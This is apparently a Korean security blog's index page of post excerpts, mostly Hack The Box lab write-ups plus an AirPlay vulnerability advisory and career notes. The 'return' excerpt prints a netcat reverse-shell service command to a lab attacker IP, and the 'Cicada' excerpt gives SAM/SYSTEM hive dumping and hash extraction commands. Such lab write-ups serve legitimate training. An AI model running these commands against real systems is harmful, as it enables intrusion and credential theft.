[์ •๋ณด] ์• ํ”Œ ๋ํŒ์™• ์ทจ์•ฝ์  Airborne ๊ณต๊ฐœ(0-Click, RCE, CVE-2025-24132)
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/๐Ÿ’™๋ธ”๋ฃจํŒ€
[๐Ÿšจ์œ„ํ—˜๋‚ด์šฉ]- Apple AirPlay์˜ "๊ณต์ค‘ ์ „ํŒŒ" ์ œ๋กœํด๋ฆญ RCE ๊ณต๊ฒฉ์œผ๋กœ 23์–ต 5์ฒœ๋งŒ ๋Œ€ ์ด์ƒ์˜ ๊ธฐ๊ธฐ๊ฐ€ Wi-Fi ๊ธฐ๋ฐ˜ ์›๊ฒฉ ํ•˜์ด์žฌํ‚น์— ๋…ธ์ถœ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. Mac, iPhone, CarPlay, ์Šคํ”ผ์ปค, TV ๋“ฑ ๊ณต์œ  ๋„คํŠธ์›Œํฌ์—์„œ ๋ชจ๋‘ ์ทจ์•ฝํ•ฉ๋‹ˆ๋‹ค.- ์›œ ๊ณต๊ฒฉ ๊ฐ€๋Šฅ. ์•…์šฉ ๊ฐ€๋Šฅ. - CVE-2025-24252- ๊ฐ™์€ ๋„คํŠธ์›Œํฌ์— ์žˆ๊ณ  ์—์–ดํ”Œ๋ ˆ์ด ์—…๋ฐ์ดํŠธ๊ฐ€ ๋˜์–ด์žˆ์ง€ ์•Š๋‹ค๋ฉด ๋‹น์‹  ๋””๋ฐ”์ด์Šค๋Š” ์ทจ์•ฝ์ ์— ๋…ธ์ถœ ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. [๐Ÿ”“๋Œ€์‘๋ฐฉ์•ˆ]- ํŒจ์น˜(iOS/macOS 18.4 ์ด์ƒ).- AirPlay ๋„๊ธฐ [๋งฅ๋ถํ•ดํ‚น]https://www.youtube.com/watch?v=ZmOvRLBL3Ys [์Šคํ”ผ์ปคํ•ดํ‚น]https://www.youtube.com/watch?v=vcs5G4JWab8 [์ž๋™์ฐจํ•ดํ‚น]https..
[HTB] return
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€
์›น์‚ฌ์ดํŠธ์—์„œ Setting ๋ถ€๋ถ„์— ์ €์žฅ์„ ๋ˆ„๋ฅด๋ฉด Server Address ๋ฐ์ดํ„ฐ๋งŒ ์ „์†ก๋˜๋Š” ๊ฒƒ์„ ํ™•์ธnc๋กœ ํฌํŠธ ๋ฆฌ์Šค๋‹ํ•˜๊ณ  ๊ณต๊ฒฉ์ž์˜ IP๋กœ ๋Œ€์ฒด์‹œ ๋น„๋ฐ€๋ฒˆํ˜ธ ํฌํ•จํ•œ ๋ฐ์ดํ„ฐ ๋…ธ์ถœ ํ™•์ธ ํ›„ ์ ‘์† [๊ณ„์ •์˜ ๊ทธ๋ฃน ๋ฐ ๊ถŒํ•œ ํ™•์ธ][SeBackupPrivilege]SAM ๋ฐ SYSTEM ํš๋“ํ•˜์—ฌ Administrator Hash ์ ‘์† ์‹œ๋„ ํ•˜์˜€์œผ๋‚˜ ๋ถˆ๊ฐ€[๊ทธ๋ฃน์†์„ฑํ™•์ธ]Print Operators ๋˜๋Š” Server Operators ๊ทธ๋ฃน์— ์†ํ•ด์žˆ์–ด์„œ ์„œ๋น„์Šค ๋“ฑ๋ก ์‹œ๋„๋ฆฌ๋ฒ„์Šค ์‰˜ ์—…๋กœ๋“œ ๋ฐ ์„œ๋น„์Šค ๋“ฑ๋ก ๋ฐ ์‹คํ–‰# ๋ฆฌ๋ฒ„์Šค์‰˜ ์„œ๋น„์Šค๋ช… VSS๋ฅผ ์ƒ์„ฑsc.exe config VSS binpath="C:\Users\svc-printer\Documents\nc.exe -e cmd 10.10.14.29 1234"[NT AUTHORIT..
[HTB] Cicada
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€
[์ดํ•ดํ•˜๊ธฐ]impacket-secretdump - ๋กœ์ปฌํ™˜๊ฒฝ[SAM] ๋กœ์ปฌ ์‚ฌ์šฉ์ž ๊ณ„์ •, SID, ํŒจ์Šค์›Œ๋“œ ํ•ด์‹œ ์ €์žฅC:\Windows\System32\config\SAM[SYSTEM] - SAM์˜ ์•”ํ˜ธํ™”๋ฅผ ํ•ด์ œํ•˜๋Š”๋ฐ ํ•„์š”ํ•œ SYSKEY ์กด์žฌC:\Windows\System32\config\SYSTEMSAM + SYSTEM ์กฐํ•ฉํ•˜์—ฌ ํ•ด์‹œ ์ถ”์ถœ# SAM ๋ฐ SYSTEM ํŒŒ์ผ ์ถ”์ถœ> reg save hklm\sam sam> reg save hklm\system system# evil-winrm ๋‹ค์šด๋กœ๋“œ ๋ช…๋ น์–ด ์‹คํ–‰> download sam> download system# ๋กœ์ปฌํ™˜๊ฒฝ์—์„œ sam ํŒŒ์ผ ๋ฐ system ํŒŒ์ผ์„ ์กฐํ•ฉํ•˜์—ฌ ํ•ด์‹œ์ถ”์ถœimpacket-secretsdump -sam sam -system syste..
[HTB] sightless
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€
๋ฆฌ๋ˆ…์Šค ๋จธ์‹ ์œผ๋กœ ์›น์„œ๋ฒ„๊ฐ€ ์žˆ์œผ๋ฉฐ, ํ•ด๋‹น ์„œ๋น„์Šค์—๋Š” Exploit ์ทจ์•ฝ์ ์ด ์žˆ๋Š” ์†”๋ฃจ์…˜์ด ์กด์žฌํ•œ๋‹ค. ์ ‘์†ํ•˜๊ฒŒ ๋˜๋ฉด ํ˜ธ์ŠคํŠธ๋„ค์ž„์œผ๋กœ ๋ณด์•„ container ํ™˜๊ฒฝ์œผ๋กœ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์„œ๋น„์Šค์˜ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค๋ฅผ ๊ณต๊ฒฉ์ž ํ˜ธ์ŠคํŠธ๋กœ ๋นผ๋‚ด์–ด ํ•ด์‹œ ํฌ๋ž˜ํ‚น์„ ํ†ตํ•˜์—ฌ ์‹๋ณ„๋œ ๊ณ„์ •์ •๋ณด๋ฅผ ๊ฐ€์ง€๊ณ  ์‹ค์ œ ํ˜ธ์ŠคํŠธ์— ์ ‘์† ์‹œ๋„๋ฅผ ํ•˜๊ฒŒ๋œ๋‹ค.ํ•ด๋‹น ํ˜ธ์ŠคํŠธ์—๋Š” ํฌ๋กœ๋ฏธ๋‹ˆ์›€ ๋ธŒ๋ผ์šฐ์ €๋Š” ์›๊ฒฉ์œผ๋กœ ๋””๋ฒ„๊น…ํ•  ์ˆ˜ ์žˆ๋„๋ก ๊ตฌ์„ฑ์ด ๋˜์–ด ์žˆ์œผ๋ฉฐ ํ•ด๋‹น ์„œ๋น„์Šค ํ™•์ธ ์‹œ ์ฃผ๊ธฐ์ ์œผ๋กœ ํŠน์ • ์‚ฌ์ดํŠธ์— ๋กœ๊ทธ์ธ ํ•˜๋Š” ๊ฒƒ์„ ์ž๋™ํ™” ํ•˜์˜€๋‹ค.์„œ๋น„์Šค์— ์ ‘์†ํ•˜๊ฒŒ๋˜๋ฉด ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๋Š” ๊ธฐ๋Šฅ์ด ์žˆ์œผ๋ฉฐ chmod setuid๋ฅผ ํ†ตํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์„ ํ•  ์ˆ˜ ์žˆ๋‹ค. [์ „์ œ์กฐ๊ฑด]- ํš๋“ํ•œ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ ๋ฐ์ดํ„ฐ๊ฐ€ ์‹ค์ œ SSH ์ ‘์†์ •๋ณด์™€ ์ผ์น˜ํ•ด์•ผ ํ•œ๋‹ค.- ํŠน์ • ์„œ๋น„์Šค์—์„œ Exploit์ด ์กด์žฌ..
[HTB] Administrator (ADํ™˜๊ฒฝ)
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€
[๊ฐœ๋…]AD(Active Directory) ํ™˜๊ฒฝ์—์„œ์˜ ์นจํˆฌ ๋ฐ•์Šค์ธ Administrator์— ๋Œ€ํ•ด์„œ ํ•™์Šต์„ ์ง„ํ–‰ ํ–ˆ๋‹ค.Active Directory๋Š” ์กฐ์ง ๋‚ด ์‚ฌ์šฉ์ž, ์ปดํ“จํ„ฐ, ๊ทธ๋ฃน ๋“ฑ์˜ ๋ฆฌ์†Œ์Šค๋ฅผ ์ค‘์•™์—์„œ ํ†ตํ•ฉ ๊ด€๋ฆฌํ•˜๊ณ , ์ธ์ฆ(Authentication)๊ณผ ์ธ๊ฐ€(Authorization)๋ฅผ ์ฒ˜๋ฆฌํ•˜๋Š” ์‹œ์Šคํ…œ์ด๋‹ค. ์ด๋Ÿฌํ•œ ์ธ์ฆ ๊ณผ์ •์€ Domain Controller(DC) ๋ผ๋Š” ์„œ๋ฒ„๊ฐ€ ๋‹ด๋‹นํ•˜๋ฉฐ, ์‚ฌ์šฉ์ž๊ฐ€ ๋„คํŠธ์›Œํฌ ๋ฆฌ์†Œ์Šค์— ์ ‘๊ทผํ•  ๋•Œ DC๊ฐ€ ๊ณ„์ • ์ •๋ณด๋ฅผ ํ™•์ธํ•˜๊ณ  ์ธ์ฆ ์—ฌ๋ถ€๋ฅผ ๊ฒฐ์ •ํ•œ๋‹ค.ํ•ด๋‹น ๋ฐ•์Šค์—์„œ๋Š” ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ ํ˜ธ์ŠคํŠธ ์•ˆ์— ์กด์žฌํ•˜๋Š” ์ •๋ณด์„ ์ด์šฉํ•˜์—ฌ BloodHound๋ฅผ ํ•™์Šตํ•˜๋Š”๋ฐ ์ค‘์ ์ด ์žˆ๋‹ค. ๋ณดํ†ต ์นจํˆฌ๋Š” ์„œ๋น„์Šค๋‚˜ ํ”„๋กœ๊ทธ๋žจ์„ ์ด์šฉํ•ด์„œ ์นจํˆฌ๋ฅผ ํ•˜๋Š” ๊ฒƒ๊ณผ ํ๋ฆ„์ด ๋‹ค๋ฅด๋‹ค. [๊ฒฐ๋ก ]ํ•˜๋‚˜์˜ ๊ณ„์ •์„ ์‹œ์ž‘์œผ๋กœ ๋‹ค๋ฅธ ..
๊ตฌ์ธ๊ณต๊ณ  ๋ฐ ์ง€์›์ž
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/๐Ÿ’ 1๋ถ„์ง€์‹
๋ณดํ†ต ํšŒ์‚ฌ์˜ ๊ตฌ์ธ๊ณต๊ณ ๋ฅผ ๋ณด๊ฒŒ๋˜๋ฉด ๋งˆ์ฃผํ•˜๋Š” ๋‚ด์šฉ์€ ๋‹ค์Œ๊ณผ ๊ตฌ์„ฑ๋œ๋‹ค๊ณ  ์ƒ๊ฐํ•œ๋‹ค. ์ƒ์„ธํ•œ ์ง๋ฌด ๋‚ด์šฉ ๊ธฐ์žฌ#๊ธฐ์กด ์ธ๋ ฅ์˜ ํ‡ด์‚ฌ- ๊ธฐ์กด KPI ๋“ฑ๊ณผ ๊ฐ™์€ ์ง๋ฌด ๋ช…์„ธ์„œ๋ฅผ ๋”ฐ๋ผ ์žฌ ๊ฐœ์‹œ#์‹ ๊ทœ ํŒ€๋นŒ๋”ฉ- ๋‹ค์ˆ˜์˜ ๋ฉด์ ‘์„ ํ†ตํ•œ ํฌ์ง€์…˜์˜ ์„ธ๋ถ„ํ™” ๋˜๋Š” ๊ธฐ์กด ๋ฐฐ๊ฒฝ์ง€์‹์„ ํ™œ์šฉํ•œ ์—…๋ฌด ๊ณต๊ณ  ํฌ๊ด„์  ์ง๋ฌด ๋‚ด์šฉ ๊ธฐ์žฌ#ํ•ด๋‹น ํฌ์ง€์…˜์˜ ์ฒซ ์‹ ๊ทœ ์ฑ„์šฉ- ๊ธฐ์กด ์ธ๋ ฅ๋“ค์ด ํ•ด๋‹น ํฌ์ง€์…˜์— ๋Œ€ํ•œ ์ดํ•ด ๋ถ€์กฑ์œผ๋กœ ์ƒ์„ธํ•œ ์ง๋ฌด ๋‚ด์šฉ ๊ธฐ์žฌ ์ „ ๊ฐ ํšŒ์‚ฌ์˜ ์กฐ์ง๋งˆ๋‹ค ๋‹ค๋ฅด๊ฒ ์ง€๋งŒ ์›ํ•˜๋Š” ์ธ์žฌ๊ฐ€ ๋‹ค๋ฅด๋‹ค. ํŠน์ • ๋ถ„์•ผ์—์„œ ์ผ์„ ์ปค๋ฒ„ํ•ด์ค„ ์ธ์› ๋˜๋Š” ์—ฌ๋Ÿฌ ๋ฒ”์œ„๋ฅผ ์ปค๋ฒ„ํ•ด์ค„ ์ธ์žฌ๋ฅผ ์ฐพ๋Š”๋‹ค๊ณ  ๋ณด๊ณ ์žˆ๋‹ค. ๋ฌผ๋ก  ๋ฉด์ ‘๊ด€์˜ ์ˆ˜์ค€์— ๋”ฐ๋ผ ๋ฉด์ ‘์ž์˜ ์ˆ˜์ค€์ด ๊ฒฐ์ • ๋  ์ˆ˜ ์žˆ๋‹ค๊ณ  ์ƒ๊ฐํ•œ๋‹ค. ์‚ฌ๋žŒ์„ ํ…Œ์ŠคํŠธํ•˜๊ณ  ์• ์ดˆ์•  ๋งˆ์Œ์— ๋“ค์ง€ ์•Š๋Š”๋‹ค๊ณ  ๋Œ€๋†“๊ณ  ํ‹ฐ๋ฅผ ๋‚ด๋Š” ๋ฉด์ ‘๊ด€์˜ ๊ฒฝ์šฐ ์˜ˆ์™ธ๋กœ ํ•˜๊ฒ ๋‹ค. ๊ฐœ์ธ์  ๊ฒฝํ—˜์œผ..
OSCP ๋„์ „์‹œ์ž‘
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€
ํ•™์ฐฝ ์‹œ์ ˆ, ์ •๋ณด๋ณด์•ˆ ๋ถ„์•ผ๋ฅผ ๊ฟˆ๊ฟจ๋˜ ์‚ฌ๋žŒ๋“ค์€ ๋Œ€๋ถ€๋ถ„ ํ•ดํ‚น์ด๋‚˜ ๊ฒŒ์ž„ ํ•ต๊ณผ ๊ฐ™์€ ์ฃผ์ œ์—์„œ ํฅ๋ฏธ๋ฅผ ๋А๋ผ๋ฉฐ ๊ด€์‹ฌ์„ ๊ฐ€์ง€๊ธฐ ์‹œ์ž‘ํ–ˆ์„ ๊ฒƒ์ด๋‹ค. ์ •๋ณด๋ณด์•ˆ ์ค‘์—์„œ๋„ ํŠนํžˆ ํ•ดํ‚น ๋ถ„์•ผ๋Š” ์˜คํŽœ์‹œ๋ธŒ ์‹œํ๋ฆฌํ‹ฐ, ์ฆ‰ ๋ ˆ๋“œํŒ€์˜ ์—ญํ• ๊ณผ ๋ฐ€์ ‘ํ•˜๋‹ค.ํ•˜์ง€๋งŒ ๋Œ€ํ•œ๋ฏผ๊ตญ์—์„œ์˜ ์ •๋ณด๋ณด์•ˆ์€ ๋ฒ•๊ณผ ์ œ๋„ ์•ˆ์—์„œ ์œ ์ง€๋˜๋Š” ์ง์—…๊ตฐ์œผ๋กœ, ๋ธ”๋ฃจํŒ€์˜ ์—ญํ• ์ด ๋Œ€๋‹ค์ˆ˜๋‹ค. ๊ธ์ •์ ์œผ๋กœ ๋ณด๋ฉด ์ œ๋„์ ์œผ๋กœ ๋ณด์žฅ๋œ ์•ˆ์ •์„ฑ์ด ์žˆ๋Š” ๋ถ„์•ผ๋‹ค. ์ฃผ๋กœ ์„ฑ์žฅ ์ค‘์ธ ์Šคํƒ€ํŠธ์—…์ด๋‚˜ ์ค‘๊ฒฌ๊ธฐ์—…, ๋Œ€๊ธฐ์—…์„ ๋Œ€์ƒ์œผ๋กœ ์ทจ์—… ๊ธฐํšŒ๊ฐ€ ์—ด๋ ค ์žˆ๋‹ค. ๋ ˆ๋“œํŒ€์˜ ์—ญํ• ์„ ๊ธฐ๋Œ€ํ•˜๊ณ  ์ž…์‚ฌ๋ฅผ ํ•˜์˜€์ง€๋งŒ ์ฃผ์š”์ •๋ณดํ†ต์‹  ๊ธฐ๋ฐ˜์‹œ์„ค์ด๋‚˜ ISO27001 ๋ฐ ISMS(P)์˜ ์ธ์ฆ์š”๊ฑด์„ ๊ฐ–์ถ”๊ธฐ ์œ„ํ•œ ํ–‰์œ„๋กœ์„œ์˜ ์—…๋ฌด์˜ ๋ฐฉํ–ฅ์„ฑ์ด ์ •ํ•ด์ง€๋Š” ๊ฒƒ์ด ๋Œ€๋ถ€๋ถ„์ด๋‹ค. ์ˆœ์ˆ˜ํžˆ ๊ธฐ์—…์˜ ๋ณด์•ˆ์‹คํƒœ์ ๊ฒ€์„ ํ•˜๋Š” ์‹œ์žฅ์ด ์ƒ๋Œ€์ ์œผ๋กœ ์ ์€ ์ด์œ ์ด๋‹ค. ๊ทธ๋Ÿฌ๋‚˜ ๊ทนํžˆ..
SSL ์ธ์ฆ์„œ๋ณด์•ˆ์ •์ฑ…(feat. ํ”„๋ก์‹œ)
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/๐Ÿ’™๋ธ”๋ฃจํŒ€
CloudFlare -> ํ”„๋ก์‹œ ์„œ๋ฒ„ -> ์„œ๋น„์Šค๋ฌธ์ œ์ ์ผ๋ฐ˜์‚ฌ์šฉ์ž๋Š” CloudFlare๋ฅผ ํ†ตํ•ด์„œ ํ”„๋ก์‹œ ์„œ๋ฒ„์˜ ๋„์›€์„ ๋ฐ›์•„ ์„œ๋น„์Šค์— ์ ‘๊ทผํ•œ๋‹ค.ํ•ด๋‹น ์„œ๋น„์Šค์—์„œ๋Š” ์ž์ฒด์ ์œผ๋กœ ์‚ฌ์šฉ์ค‘์ธ SSL์ธ์ฆ์„œ๊ฐ€ ์กด์žฌํ•œ๋‹ค.CloudFlare๋Š” ํ”„๋ก์‹œ์„œ๋ฒ„๋ฅผ ํ†ตํ•˜์—ฌ ์„œ๋น„์Šค์— ์ ‘๊ทผํ•˜๊ธฐ์— ์ž์ฒด์  ์„œ๋ช…๋œ ์ธ์ฆ์„œ๋Š” ์‹ ๋ขฐ๋ฅผ ํ•  ์ˆ˜ ์—†๋‹ค.๊ทธ๋ ‡๊ธฐ์— ํ”„๋ก์‹œ ์„œ๋ฒ„ ์ž์ฒด์—์„œ ํ•ด๋‹น ์„œ๋น„์Šค์˜ ์ธ์ฆ์„œ์— ๋Œ€ํ•œ ์‹ ๋ขฐ์„ฑ์„ ์ ์šฉํ•˜์—ฌ CloudFlare์—๊ฒŒ ์‘๋‹ตํ•ด์•ผํ•œ๋‹ค.์ฆ‰, ์‹ ๋ขฐ๊ด€๊ณ„ ๋ถ€์กฑ์œผ๋กœ ์ธํ•œ ํ˜„์ƒ  cloudflared๊ฐ€ Harbor ์„œ๋ฒ„์˜ ์ธ์ฆ์„œ๋ฅผ ์‹ ๋ขฐํ•˜์ง€ ์•Š๊ธฐ ๋•Œ๋ฌธ์ž…๋‹ˆ๋‹ค. ์ด๋Ÿฐ ์ƒํ™ฉ์ด ๋ฐœ์ƒํ•˜๋Š” ์ด์œ ๋Š”:์ž์ฒด ์„œ๋ช…๋œ ์ธ์ฆ์„œ: Harbor๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ ์„ค์น˜ ๊ณผ์ •์—์„œ ์ž์ฒด ์„œ๋ช…๋œ ์ธ์ฆ์„œ๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฐ ์ธ์ฆ์„œ๋Š” ๊ณต์ธ๋œ ์ธ์ฆ ๊ธฐ๊ด€(CA)์—์„œ ์„œ๋ช…ํ•˜์ง€ ์•Š์•˜๊ธฐ..
[HTB] underpass
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€
1. smnp v1 string ๋ฉ”์‹œ์ง€์—์„œ ์„œ๋น„์Šค ์ •๋ณด ํ™•์ธ2. ์„œ๋น„์Šค์˜ ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€ ํ™•์ธ ํ›„ ๊ธฐ๋ณธ ๊ณ„์ • ์ž…๋ ฅ3. ์ €์žฅ๋œ ๊ณ„์ •์˜ ํ•ด์‹œ์ •๋ณด ํ™•์ธ4. SSH ์ •๋ณด์™€ ๊ฐ™๋‹ค๋Š” ๊ฐ€์ •ํ•˜์— ๋กœ๊ทธ์ธ5. ๊ณ„์ •์˜ sudo ๊ถŒํ•œ ํ™•์ธ6. mosh-server ๊ด€๋ จ Privileges Escalation ์ด์šฉ
[HTB] Titanic
ยท
๐Ÿค–์ •๋ณด๋ณด์•ˆ/โค๏ธ๋ ˆ๋“œํŒ€
1. ์ •๋ณด์ˆ˜์ง‘2. ์›น์„œ๋น„์Šค ํŒŒ์ผ ๋‹ค์šด๋กœ๋“œ ์ทจ์•ฝ์  ํ™•์ธ ๋ฐ /etc/passwd ๋‹ค์šด๋กœ๋“œ3. ์›น์„œ๋น„์Šค ์„œ๋ธŒ๋„๋ฉ”์ธ ์ •๋ณด์ˆ˜์ง‘ ๋ฐ Gitea ์„œ๋น„์Šค ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค ๋‹ค์šด๋กœ๋“œ4. DB user ํ…Œ์ด๋ธ” ๊ณ„์ • ๋น„๋ฐ€๋ฒˆํ˜ธ ํฌ๋ž™ ๋ฐ SSH ์ ‘์† ์‹œ๋„5. ์Šคํฌ๋ฆฝํŠธ ๊ตฌ๋ฌธ์—์„œ magick ๊ด€๋ฆฌ์ž ๊ถŒํ•œ์œผ๋กœ ์‹คํ–‰ ํ™•์ธ ๋ฐ ์ทจ์•ฝ์  ์ด์šฉ 1. ์™ธ๋ถ€์ •๋ณด์ˆ˜์ง‘nmap ํ›„ 80ํฌํŠธ์—์„œ ์›น์„œ๋น„์Šค๊ฐ€ ๋™์ž‘ํ•จ์„ ํ™•์ธํ–ˆ๋‹ค.2.์„œ๋น„์Šค์ •๋ณด์ˆ˜์ง‘์„œ๋น„์Šค์˜ ์ทจ์•ฝ์  ์ •๋ณด๋ฅผ ์ˆ˜์ง‘ํ•˜์˜€์œผ๋‚˜ ํ™•์ธ๋œ ์‚ฌํ•ญ์€ ์—†๋‹ค(apache 2.4.52) 3.์›น์„œ๋น„์Šค์ •๋ณด์ˆ˜์ง‘์›น ์„œ๋น„์Šค์˜ ๊ธฐ๋Šฅ์„ ํ™•์ธํ•˜์—ฌ ์„œ๋ฒ„๋กœ ์นจํˆฌ ํฌ์ธํŠธ๋ฅผ ํƒ์ƒ‰ํ•œ๋‹ค. ํ•ด๋‹น ์‚ฌ์ดํŠธ๋Š” ์›น์‚ฌ์ดํŠธ์—์„œ ์˜ˆ์•ฝํ•  ์ˆ˜ ์žˆ๋Š” ๊ธฐ๋Šฅ์„ ์ œ๊ณตํ•œ๋‹ค. [์˜ˆ์•ฝ๊ธฐ๋Šฅ]๋™์ž‘ํ™•์ธ1. ์ •๋ณด ๊ธฐ์ž… ํ›„ Submit์„ ๋ˆ„๋ฅด๋ฉด POST๋กœ ์ •๋ณด๋ฅผ ์„œ๋ฒ„์—์„œ ๋ณด๋‚ธ๋‹ค.2...